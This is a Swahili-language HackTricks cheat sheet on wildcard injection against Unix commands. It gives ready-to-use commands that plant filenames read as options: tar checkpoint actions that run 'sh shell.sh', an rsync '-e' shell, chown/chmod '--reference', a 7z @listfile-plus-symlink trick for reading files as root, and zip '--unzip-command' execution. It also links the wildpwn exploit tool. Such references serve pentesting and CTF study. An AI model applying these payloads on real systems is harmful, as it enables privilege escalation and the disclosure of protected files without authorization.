Wildcards Spare tricks

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

chown, chmod

Unaweza kuonyesha mmiliki wa faili na ruhusa unayotaka kunakili kwa faili zingine zote

touch "--reference=/my/own/path/filename"

Unaweza kutumia hii kwa kutumia https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (shambulio lililounganishwa) Maelezo zaidi katika https://www.exploit-db.com/papers/33930

Tar

Tekeleza amri za kiholela:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Unaweza kutumia hii kwa kufaidika na https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (shambulio la tar) Maelezo zaidi katika https://www.exploit-db.com/papers/33930

Rsync

Tekeleza amri za kiholela:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Unaweza kutumia hii kwa kutumia https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(shambulio la rsync) Maelezo zaidi katika https://www.exploit-db.com/papers/33930

7z

Katika 7z hata kwa kutumia -- kabla ya * (kumbuka kuwa -- inamaanisha kuwa kuingia inayofuata haiwezi kutibiwa kama vigezo, kwa hivyo ni njia za faili tu katika kesi hii) unaweza kusababisha kosa la kusoma faili, kwa hivyo ikiwa amri kama ifuatayo inatekelezwa na root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Na unaweza kuunda faili katika saraka ambapo hii inatekelezwa, unaweza kuunda faili @root.txt na faili root.txt ikiwa ni symlink kwa faili unayotaka kusoma:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Kisha, wakati 7z inatekelezwa, itaichukulia root.txt kama faili inayojumuisha orodha ya faili ambazo inapaswa kuzipiga (ndio maana ya uwepo wa @root.txt) na wakati 7z inasoma root.txt itasoma /file/you/want/to/read na kwa kuwa maudhui ya faili hii sio orodha ya faili, itatoa kosa kuonyesha maudhui.

Maelezo zaidi katika Write-ups ya sanduku la CTF kutoka HackTheBox.

Zip

Tekeleza amri za aina yoyote:

zip name.zip files -T --unzip-command "sh -c whoami"
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Last updated